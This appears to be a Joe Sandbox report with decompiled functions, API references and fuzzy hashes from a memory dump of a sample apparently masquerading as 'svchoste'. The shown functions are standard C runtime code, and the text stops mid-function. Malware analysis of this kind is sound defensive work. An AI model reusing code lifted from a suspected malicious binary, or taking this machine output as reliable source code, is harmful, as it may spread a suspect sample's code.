0x00b8d8f5
0x00b8d770
0x00b8d775
0x00b8d77a
0x00b8d77c
0x00000000
0x00b8d782
0x00b8d78d
0x00b8d791
0x00b8d796
0x00b8d8a1
0x00b8d8ac
0x00b8d8af
0x00b8d79c
0x00b8d7a4
0x00b8d7ac
0x00b8d7b3
0x00b8d7c0
0x00b8d7c3
0x00b8d7d4
0x00b8d7d7
0x00b8d7e7
0x00b8d7ea
0x00b8d7f9
0x00b8d800
0x00b8d81c
0x00b8d831
0x00b8d838
0x00b8d884
0x00b8d88f
0x00b8d892
0x00b8d83a
0x00b8d845
0x00b8d84a
0x00b8d858
0x00b8d860
0x00b8d863
0x00b8d866
0x00b8d870
0x00b8d875
0x00b8d875
0x00b8d838
0x00b8d800
0x00000000
0x00b8d796

APIs

_memset.LIBCMT ref: 00B8D7A4
LocalAlloc.KERNEL32(00000040,?), ref: 00B8D7F3

Strings

@, xrefs: 00B8D7AC
v10, xrefs: 00B8D770
null, xrefs: 00B8D87C
null, xrefs: 00B8D899

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: AllocLocal_memset
String ID: @$null$null$v10
API String ID: 52611349-142188288
Opcode ID: e461d5196f50b6166395b57018ea14a1894133330660ea15bf3d925889600c3e
Instruction ID: e5f99d65961b58889047945ac1d5ffad341179d8a48cf19b0668e553b2c51fc9
Opcode Fuzzy Hash: e461d5196f50b6166395b57018ea14a1894133330660ea15bf3d925889600c3e
Instruction Fuzzy Hash: CA51F871A04208AFDB04DFD8D885BDEBBF5FF48304F108569F919AB294DB74A945CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00B7831E, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 90%

			E00B7831E(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t26;
				intOrPtr _t30;
				intOrPtr _t39;
				void* _t40;

				_push(8);
				_push(0xb9de30);
				E00B78C20(__ebx, __edi, __esi);
				GetModuleHandleW(L"KERNEL32.DLL");
				_t39 =  *((intOrPtr*)(_t40 + 8));
				 *((intOrPtr*)(_t39 + 0x5c)) = 0xb981f0;
				 *(_t39 + 8) =  *(_t39 + 8) & 0x00000000;
				 *((intOrPtr*)(_t39 + 0x14)) = 1;
				 *((intOrPtr*)(_t39 + 0x70)) = 1;
				 *((char*)(_t39 + 0xc8)) = 0x43;
				 *((char*)(_t39 + 0x14b)) = 0x43;
				 *(_t39 + 0x68) = 0xba0200;
				E00B7B23F(0xd);
				 *(_t40 - 4) =  *(_t40 - 4) & 0x00000000;
				InterlockedIncrement( *(_t39 + 0x68));
				 *(_t40 - 4) = 0xfffffffe;
				E00B783C0();
				E00B7B23F(0xc);
				 *(_t40 - 4) = 1;
				_t26 =  *((intOrPtr*)(_t40 + 0xc));
				 *((intOrPtr*)(_t39 + 0x6c)) = _t26;
				if(_t26 == 0) {
					_t30 =  *0xba0968; // 0xba0890
					 *((intOrPtr*)(_t39 + 0x6c)) = _t30;
				}
				E00B77F62( *((intOrPtr*)(_t39 + 0x6c)));
				 *(_t40 - 4) = 0xfffffffe;
				return E00B78C65(E00B783C9());
			}

0x00b7831e
0x00b78320
0x00b78325
0x00b7832f
0x00b78335
0x00b78338
0x00b7833f
0x00b78346
0x00b78349
0x00b7834c
0x00b78353
0x00b7835a
0x00b78363
0x00b78369
0x00b78370
0x00b78376
0x00b7837d
0x00b78384
0x00b7838a
0x00b7838d
0x00b78390
0x00b78395
0x00b78397
0x00b7839c
0x00b7839c
0x00b783a2
0x00b783a8
0x00b783b9

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,00B9DE30,00000008,00B78426,00000000,00000000,?,?,00B746A4,00000001,00000000,?,?,?,00B74702,?), ref: 00B7832F
__lock.LIBCMT ref: 00B78363

Part of subcall function 00B7B23F: __mtinitlocknum.LIBCMT ref: 00B7B255
Part of subcall function 00B7B23F: __amsg_exit.LIBCMT ref: 00B7B261
Part of subcall function 00B7B23F: EnterCriticalSection.KERNEL32(00000000,00000000,?,00B78368,0000000D), ref: 00B7B269

InterlockedIncrement.KERNEL32(?), ref: 00B78370
__lock.LIBCMT ref: 00B78384
___addlocaleref.LIBCMT ref: 00B783A2

Strings

KERNEL32.DLL, xrefs: 00B7832A

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
String ID: KERNEL32.DLL
API String ID: 637971194-2576044830
Opcode ID: b6442366eba66c3b218de95e846cecb7b9341fe55900af8c18f8a2bcad473a67
Instruction ID: f0b76b08c4879a25feb43e4ee4a7318997514bad8ff915010e38e79e3191904e
Opcode Fuzzy Hash: b6442366eba66c3b218de95e846cecb7b9341fe55900af8c18f8a2bcad473a67
Instruction Fuzzy Hash: 91014871445700DFDB20AF69D909749FBE0EF10714F10898EE5AA972E1CFB4A544CF15

Uniqueness

Uniqueness Score: -1.00%

Function 00B95742, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00B95742(void* __ebx, void* __edx, void* __esi, intOrPtr* _a4) {
				signed int _v8;
				void* __ebp;
				void* _t16;
				intOrPtr* _t19;
				void* _t25;

				_t26 = __esi;
				_t24 = __edx;
				_t23 = __ebx;
				_t31 =  *((intOrPtr*)( *_a4)) - 0xe0434352;
				if( *((intOrPtr*)( *_a4)) == 0xe0434352) {
					L8:
					__eflags =  *((intOrPtr*)(E00B7844B(_t24, _t25, __eflags) + 0x90));
					if(__eflags > 0) {
						_t16 = E00B7844B(_t24, _t25, __eflags);
						_t9 = _t16 + 0x90;
						 *_t9 =  *((intOrPtr*)(_t16 + 0x90)) - 1;
						__eflags =  *_t9;
					}
					goto L10;
				} else {
					__eflags = __eax - 0xe0434f4d;
					if(__eflags == 0) {
						goto L8;
					} else {
						__eflags = __eax - 0xe06d7363;
						if(__eflags != 0) {
							L10:
							__eflags = 0;
							return 0;
						} else {
							 *(E00B7844B(__edx, __edi, __eflags) + 0x90) =  *(__eax + 0x90) & 0x00000000;
							_push(8);
							_push(0xb9dfe8);
							E00B78C20(__ebx, _t25, __esi);
							_t19 =  *((intOrPtr*)(E00B7844B(__edx, _t25, _t31) + 0x78));
							if(_t19 != 0) {
								_v8 = _v8 & 0x00000000;
								 *_t19();
								_v8 = 0xfffffffe;
							}
							return E00B78C65(E00B825F1(_t23, _t24, _t25, _t26));
						}
					}
				}
			}

0x00b95742
0x00b95742
0x00b95742
0x00b9574e
0x00b95753
0x00b95774
0x00b95779
0x00b95780
0x00b95782
0x00b95787
0x00b95787
0x00b95787
0x00b95787
0x00000000
0x00b95755
0x00b95755
0x00b9575a
0x00000000
0x00b9575c
0x00b9575c
0x00b95761
0x00b9578d
0x00b9578d
0x00b95790
0x00b95763
0x00b95768
0x00b7f63d
0x00b7f63f
0x00b7f644
0x00b7f64e
0x00b7f653
0x00b7f655
0x00b7f659
0x00b7f664
0x00b7f664
0x00b7f675
0x00b7f675
0x00b95761
0x00b9575a

APIs

__getptd.LIBCMT ref: 00B95763

Part of subcall function 00B7844B: __getptd_noexit.LIBCMT ref: 00B7844E
Part of subcall function 00B7844B: __amsg_exit.LIBCMT ref: 00B7845B

__getptd.LIBCMT ref: 00B95774
__getptd.LIBCMT ref: 00B95782

Strings

MOC, xrefs: 00B95755
csm, xrefs: 00B9575C
RCC, xrefs: 00B9574E

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: MOC$RCC$csm
API String ID: 803148776-2671469338
Opcode ID: 36e216435a19a69b5e7bcfee0304e1495cac26ab6edcfc8f9ed2c1b4ad4e0b23
Instruction ID: e96851156fdcead90cc7db30769db51146c1281a1d62205f49715cbf778d3aa3
Opcode Fuzzy Hash: 36e216435a19a69b5e7bcfee0304e1495cac26ab6edcfc8f9ed2c1b4ad4e0b23
Instruction Fuzzy Hash: 01E0ED301445048FCB219BE8808A7A836E5EB44314F1545F1A51CCB222DA68DD508A83

Uniqueness

Uniqueness Score: -1.00%

Function 00B959F4, Relevance: 9.0, APIs: 6, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 89%

			E00B959F4(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t48;
				void* _t53;
				intOrPtr _t57;
				void* _t58;
				void* _t61;

				_t61 = __eflags;
				_push(0x2c);
				_push(0xb9e7c8);
				E00B78C20(__ebx, __edi, __esi);
				_t48 = __ecx;
				_t55 =  *((intOrPtr*)(_t58 + 0xc));
				_t57 =  *((intOrPtr*)(_t58 + 8));
				 *((intOrPtr*)(_t58 - 0x1c)) = __ecx;
				 *(_t58 - 0x34) =  *(_t58 - 0x34) & 0x00000000;
				 *((intOrPtr*)(_t58 - 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0xc)) - 4));
				 *((intOrPtr*)(_t58 - 0x28)) = E00B95587(_t58 - 0x3c,  *((intOrPtr*)(_t57 + 0x18)));
				 *((intOrPtr*)(_t58 - 0x2c)) =  *((intOrPtr*)(E00B7844B(_t53, _t55, _t61) + 0x88));
				 *((intOrPtr*)(_t58 - 0x30)) =  *((intOrPtr*)(E00B7844B(_t53, _t55, _t61) + 0x8c));
				 *((intOrPtr*)(E00B7844B(_t53, _t55, _t61) + 0x88)) = _t57;
				 *((intOrPtr*)(E00B7844B(_t53, _t55, _t61) + 0x8c)) =  *((intOrPtr*)(_t58 + 0x10));
				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
				 *((intOrPtr*)(_t58 + 0x10)) = 1;
				 *(_t58 - 4) = 1;
				 *((intOrPtr*)(_t58 - 0x1c)) = E00B9562C(_t55,  *((intOrPtr*)(_t58 + 0x14)), _t48,  *((intOrPtr*)(_t58 + 0x18)),  *((intOrPtr*)(_t58 + 0x1c)));
				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
				 *(_t58 - 4) = 0xfffffffe;
				 *((intOrPtr*)(_t58 + 0x10)) = 0;
				E00B95B1A(_t48, _t53, _t55, _t57, _t61);
				return E00B78C65( *((intOrPtr*)(_t58 - 0x1c)));
			}

0x00b959f4
0x00b959f4
0x00b959f6
0x00b959fb
0x00b95a00
0x00b95a02
0x00b95a05
0x00b95a08
0x00b95a0b
0x00b95a12
0x00b95a23
0x00b95a31
0x00b95a3f
0x00b95a47
0x00b95a55
0x00b95a5b
0x00b95a62
0x00b95a65
0x00b95a7b
0x00b95a7e
0x00b95af3
0x00b95afa
0x00b95b01
0x00b95b0e

APIs

__CreateFrameInfo.LIBCMT ref: 00B95A1C

Part of subcall function 00B95587: __getptd.LIBCMT ref: 00B95595
Part of subcall function 00B95587: __getptd.LIBCMT ref: 00B955A3

__getptd.LIBCMT ref: 00B95A26

Part of subcall function 00B7844B: __getptd_noexit.LIBCMT ref: 00B7844E
Part of subcall function 00B7844B: __amsg_exit.LIBCMT ref: 00B7845B

__getptd.LIBCMT ref: 00B95A34
__getptd.LIBCMT ref: 00B95A42
__getptd.LIBCMT ref: 00B95A4D
_CallCatchBlock2.LIBCMT ref: 00B95A73

Part of subcall function 00B9562C: __CallSettingFrame@12.LIBCMT ref: 00B95678

Part of subcall function 00B95B1A: __getptd.LIBCMT ref: 00B95B29
Part of subcall function 00B95B1A: __getptd.LIBCMT ref: 00B95B37

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 1602911419-0
Opcode ID: 85403c02b14425de05b76143ca6f711732b13ce875e0964cddc780bfb2e41505
Instruction ID: ee61f1a4448af1d9259184bcbe2d73f59dcf23950b8e321ec2b6bb4a4359aac5
Opcode Fuzzy Hash: 85403c02b14425de05b76143ca6f711732b13ce875e0964cddc780bfb2e41505
Instruction Fuzzy Hash: 3811B4B1D40609AFDF11EFA4C489AAD7BF0FB04310F1081A9E829A7251DB789A159B51

Uniqueness

Uniqueness Score: -1.00%

Function 00B77AA1, Relevance: 9.0, APIs: 6, Instructions: 47
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 92%

			E00B77AA1(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0xb9ddd0);
				E00B78C20(__ebx, __edi, __esi);
				_t31 = E00B7844B(__edx, __edi, _t35);
				_t15 =  *0xba0720; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E00B7B23F(0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0xba0628; // 0x2d015f8
					if(__eflags != 0) {
						__eflags = _t33;
						if(__eflags != 0) {
							__eflags = InterlockedDecrement(_t33);
							if(__eflags == 0) {
								__eflags = _t33 - 0xba0200;
								if(__eflags != 0) {
									E00B75341(_t33);
								}
							}
						}
						_t21 =  *0xba0628; // 0x2d015f8
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0xba0628; // 0x2d015f8
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E00B77B3C();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				_t38 = _t33;
				if(_t33 == 0) {
					E00B78BF8(_t25, _t29, _t31, _t33, _t38, 0x20);
				}
				return E00B78C65(_t33);
			}

0x00b77aa1
0x00b77aa1
0x00b77aa1
0x00b77aa1
0x00b77aa3
0x00b77aa8
0x00b77ab2
0x00b77ab4
0x00b77abc
0x00b77add
0x00b77ae3
0x00b77ae7
0x00b77aea
0x00b77aed
0x00b77af3
0x00b77af5
0x00b77af7
0x00b77b00
0x00b77b02
0x00b77b04
0x00b77b0a
0x00b77b0d
0x00b77b12
0x00b77b0a
0x00b77b02
0x00b77b13
0x00b77b18
0x00b77b1b
0x00b77b21
0x00b77b25
0x00b77b25
0x00b77b2b
0x00b77b32
0x00b77ac4
0x00b77ac4
0x00b77ac4
0x00b77ac7
0x00b77ac9
0x00b77acd
0x00b77ad2
0x00b77ada

APIs

__getptd.LIBCMT ref: 00B77AAD

Part of subcall function 00B7844B: __getptd_noexit.LIBCMT ref: 00B7844E
Part of subcall function 00B7844B: __amsg_exit.LIBCMT ref: 00B7845B

__amsg_exit.LIBCMT ref: 00B77ACD
__lock.LIBCMT ref: 00B77ADD
InterlockedDecrement.KERNEL32(?), ref: 00B77AFA
_free.LIBCMT ref: 00B77B0D
InterlockedIncrement.KERNEL32(02D015F8), ref: 00B77B25

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
String ID:
API String ID: 3470314060-0
Opcode ID: b5ad8f345fe2f2bb14d4d10ab6d243745b2708f1d6ed7c7e369f773b4b3ab906
Instruction ID: 3d64f2cfe8280515a77f8de54b7295939a2015acf92fcf246d77975939b412cd
Opcode Fuzzy Hash: b5ad8f345fe2f2bb14d4d10ab6d243745b2708f1d6ed7c7e369f773b4b3ab906
Instruction Fuzzy Hash: 2001C431D96711ABDB21AF68984AB5D77E0EF09720F04C085E828A7291CF306A41CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 00B8F7B0, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B8F7B0(void* __edx, void* __edi, void* __esi, WCHAR* _a4) {
				LPWSTR* _v8;
				LPWSTR* _v12;
				long _v16;
				WCHAR* _v20;
				signed int _v24;
				LPWSTR* _t63;
				WCHAR* _t69;
				void* _t79;
				void* _t108;
				void* _t110;

				_v8 = 0;
				if(_a4 == 0 || ( *_a4 & 0x0000ffff) == 0) {
					E00B8F590(2);
					return 0;
				} else {
					_t63 = E00B7537B(__edx, __edi, __esi, 0x47c);
					_t110 = _t108 + 4;
					_v8 = _t63;
					if(_v8 == 0) {
						_v12 = 1;
					} else {
						_v8[0x11d] = 0xffffffff;
						_v8[0x11e] = 0;
						_v8[0x11c] = 0;
						_v16 = GetFullPathNameW(_a4, 0, 0, 0);
						_t69 = E00B7537B(_a4, __edi, __esi, _v16 + _v16 + 0x10);
						_t110 = _t110 + 4;
						_v8[0x11e] = _t69;
						if(_v8[0x11e] == 0) {
							_v12 = 1;
						} else {
							_v16 = GetFullPathNameW(_a4, _v16, _v8[0x11e], 0);
							if(_v16 <= 0) {
								E00B8F590(2);
								_t110 = _t110 + 4;
								_v12 = 1;
							} else {
								_v20 =  &(_v8[0x11e][_v16]);
								if(_v8[0x11e] < _v20) {
									_v24 =  *(_v20 - 2) & 0x0000ffff;
									if(_v24 != 0x2f && _v24 != 0x3a && _v24 != 0x5c) {
										 *_v20 = 0x5c;
										_v20 =  &(_v20[1]);
									}
								}
								 *_v20 = 0x2a;
								_v20 =  &(_v20[1]);
								 *_v20 = 0;
								_t79 = E00B8F6B0(0, _v8);
								_t110 = _t110 + 4;
								if(_t79 == 0) {
									_v12 = 1;
									E00B8F590(2);
									_t110 = _t110 + 4;
								} else {
									_v12 = 0;
								}
							}
						}
					}
					if(_v12 != 0 && _v8 != 0) {
						E00B8F720(_v8, _v8);
						_v8 = 0;
					}
					return _v8;
				}
			}

0x00b8f7b6
0x00b8f7c1
0x00b8f7cf
0x00000000
0x00b8f7de
0x00b8f7e3
0x00b8f7e8
0x00b8f7eb
0x00b8f7f2
0x00b8f93a
0x00b8f7f8
0x00b8f7fb
0x00b8f808
0x00b8f815
0x00b8f82f
0x00b8f83a
0x00b8f83f
0x00b8f845
0x00b8f855
0x00b8f931
0x00b8f85b
0x00b8f875
0x00b8f87c
0x00b8f920
0x00b8f925
0x00b8f928
0x00b8f882
0x00b8f891
0x00b8f8a0
0x00b8f8a9
0x00b8f8b0
0x00b8f8ca
0x00b8f8d3
0x00b8f8d3
0x00b8f8b0
0x00b8f8de
0x00b8f8e7
0x00b8f8ef
0x00b8f8f6
0x00b8f8fb
0x00b8f900
0x00b8f90b
0x00b8f914
0x00b8f919
0x00b8f902
0x00b8f902
0x00b8f902
0x00b8f91c
0x00b8f92f
0x00b8f938
0x00b8f945
0x00b8f951
0x00b8f959
0x00b8f959
0x00000000
0x00b8f960

APIs

_malloc.LIBCMT ref: 00B8F7E3
GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00B8F829
_malloc.LIBCMT ref: 00B8F83A
GetFullPathNameW.KERNEL32(00000000,?,?,00000000), ref: 00B8F86F

Strings

\, xrefs: 00B8F8B8

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: FullNamePath_malloc
String ID: \
API String ID: 3141036907-2967466578
Opcode ID: e6f48fa4ec5f10bf258b24b38140a803b9d788e04549755362d1d54aa1bd153f
Instruction ID: e5f72e68fa23913f0f3e03edab42aeee723d4a2c64304b8f52af5ae8437c20a4
Opcode Fuzzy Hash: e6f48fa4ec5f10bf258b24b38140a803b9d788e04549755362d1d54aa1bd153f
Instruction Fuzzy Hash: FF512BB4D0420AEBDB14EF94C489BBEB7F0FF04304F2445A9E519AB3A1E7749A80CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00B95DA1, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 27%

			E00B95DA1(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				void* __ebp;
				void* _t20;
				void* _t22;
				void* _t23;
				void* _t25;
				intOrPtr* _t26;
				void* _t27;
				void* _t28;

				_t27 = __esi;
				_t26 = __edi;
				_t23 = __ecx;
				_t22 = __ebx;
				_t30 = _a20;
				if(_a20 != 0) {
					_push(_a20);
					_push(__ebx);
					_push(__esi);
					_push(_a4);
					E00B95D0F(__ebx, __edi, __esi, _t30);
					_t28 = _t28 + 0x10;
				}
				_t31 = _a28;
				_push(_a4);
				if(_a28 != 0) {
					_push(_a28);
				} else {
					_push(_t27);
				}
				E00B952E1(_t23);
				_push( *_t26);
				_push(_a16);
				_push(_a12);
				_push(_t27);
				E00B95791(_t22, _t25, _t26, _t27, _t31);
				_push(0x100);
				_push(_a24);
				_push(_a16);
				 *((intOrPtr*)(_t27 + 8)) =  *((intOrPtr*)(_t26 + 4)) + 1;
				_push(_a8);
				_t14 = _t22 + 0xc; // 0x6e
				_push(_t27);
				_push(_a4);
				_t20 = E00B959F4(_t22,  *_t14, _t26, _t27, _t31);
				if(_t20 != 0) {
					E00B952A8(_t20, _t27);
					return _t20;
				}
				return _t20;
			}

0x00b95da1
0x00b95da1
0x00b95da1
0x00b95da1
0x00b95da6
0x00b95daa
0x00b95dac
0x00b95daf
0x00b95db0
0x00b95db1
0x00b95db4
0x00b95db9
0x00b95db9
0x00b95dbc
0x00b95dc0
0x00b95dc3
0x00b95dc8
0x00b95dc5
0x00b95dc5
0x00b95dc5
0x00b95dcb
0x00b95dd0
0x00b95dd2
0x00b95dd5
0x00b95dd8
0x00b95dd9
0x00b95de1
0x00b95de6
0x00b95dea
0x00b95ded
0x00b95df0
0x00b95df3
0x00b95df6
0x00b95df7
0x00b95dfa
0x00b95e04
0x00b95e08
0x00000000
0x00b95e08
0x00b95e0e

APIs

___BuildCatchObject.LIBCMT ref: 00B95DB4

Part of subcall function 00B95D0F: ___BuildCatchObjectHelper.LIBCMT ref: 00B95D45

_UnwindNestedFrames.LIBCMT ref: 00B95DCB
___FrameUnwindToState.LIBCMT ref: 00B95DD9

Strings

csm, xrefs: 00B95DA3
csm, xrefs: 00B95DB0, 00B95DC5, 00B95DD8, 00B95DF6, 00B95E06

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
String ID: csm$csm
API String ID: 2163707966-3733052814
Opcode ID: 50106dbe3085d0e97134de8a49b133a93f62fdee1138184848a79e6080759471
Instruction ID: 6dac331c30bd6d16672c86a4966e1ffefec71b93629a63176e50f27501c98059
Opcode Fuzzy Hash: 50106dbe3085d0e97134de8a49b133a93f62fdee1138184848a79e6080759471
Instruction Fuzzy Hash: F401E47108190ABBDF236F51CC49EAA7FAAEF08350F144064BD5815161D73699B1DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B761D1, Relevance: 7.7, APIs: 5, Instructions: 160
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 96%

			E00B761D1(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
				signed int _v8;
				char* _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t82;
				char _t89;
				signed int _t96;
				void* _t97;
				signed int _t98;
				signed int _t101;
				signed int _t104;
				signed int _t108;
				signed int _t109;
				char* _t110;
				signed int _t119;
				signed int _t122;
				signed int _t123;
				signed int _t124;
				signed int _t125;
				void* _t126;

				_t110 = _a4;
				_t108 = _a8;
				_t122 = _a12;
				_v12 = _t110;
				_v8 = _t108;
				if(_t122 == 0 || _a16 == 0) {
					L5:
					return 0;
				} else {
					_t130 = _t110;
					if(_t110 != 0) {
						_t125 = _a20;
						__eflags = _t125;
						if(_t125 == 0) {
							L9:
							__eflags = _t108 - 0xffffffff;
							if(_t108 != 0xffffffff) {
								_t82 = E00B791C0(_t110, 0, _t108);
								_t126 = _t126 + 0xc;
							}
							__eflags = _t125;
							if(__eflags == 0) {
								goto L3;
							} else {
								__eflags = _a16 - (_t82 | 0xffffffff) / _t122;
								if(__eflags > 0) {
									goto L3;
								}
								L13:
								_t123 = _t122 * _a16;
								__eflags =  *(_t125 + 0xc) & 0x0000010c;
								_v20 = _t123;
								_t109 = _t123;
								if(( *(_t125 + 0xc) & 0x0000010c) == 0) {
									_v16 = 0x1000;
								} else {
									_v16 =  *((intOrPtr*)(_t125 + 0x18));
								}
								__eflags = _t123;
								if(_t123 == 0) {
									L40:
									return _a16;
								} else {
									do {
										__eflags =  *(_t125 + 0xc) & 0x0000010c;
										if(( *(_t125 + 0xc) & 0x0000010c) == 0) {
											L24:
											__eflags = _t109 - _v16;
											if(_t109 < _v16) {
												_t89 = E00B7C6BF(_t109, _t123, _t125);
												__eflags = _t89 - 0xffffffff;
												if(_t89 == 0xffffffff) {
													L45:
													return (_t123 - _t109) / _a12;
												}
												__eflags = _v8;
												if(_v8 == 0) {
													L41:
													__eflags = _a8 - 0xffffffff;
													if(__eflags != 0) {
														E00B791C0(_a4, 0, _a8);
													}
													 *((intOrPtr*)(E00B75A49(__eflags))) = 0x22;
													L4:
													E00B77461();
													goto L5;
												}
												_t112 = _v12;
												_v12 = _v12 + 1;
												 *_v12 = _t89;
												_t109 = _t109 - 1;
												_t65 =  &_v8;
												 *_t65 = _v8 - 1;
												__eflags =  *_t65;
												_v16 =  *((intOrPtr*)(_t125 + 0x18));
												goto L39;
											}
											__eflags = _v16;
											if(_v16 == 0) {
												_t96 = 0x7fffffff;
												__eflags = _t109 - 0x7fffffff;
												if(_t109 <= 0x7fffffff) {
													_t96 = _t109;
												}
											} else {
												__eflags = _t109 - 0x7fffffff;
												if(_t109 <= 0x7fffffff) {
													_t50 = _t109 % _v16;
													__eflags = _t50;
													_t119 = _t50;
													_t101 = _t109;
												} else {
													_t119 = 0x7fffffff % _v16;
													_t101 = 0x7fffffff;
												}
												_t96 = _t101 - _t119;
											}
											__eflags = _t96 - _v8;
											if(_t96 > _v8) {
												goto L41;
											} else {
												_push(_t96);
												_push(_v12);
												_t97 = E00B7AE85(_t125);
												_pop(_t112);
												_push(_t97);
												_t98 = E00B7CD98(_t109, _t123, _t125, __eflags);
												_t126 = _t126 + 0xc;
												__eflags = _t98;
												if(_t98 == 0) {
													 *(_t125 + 0xc) =  *(_t125 + 0xc) | 0x00000010;
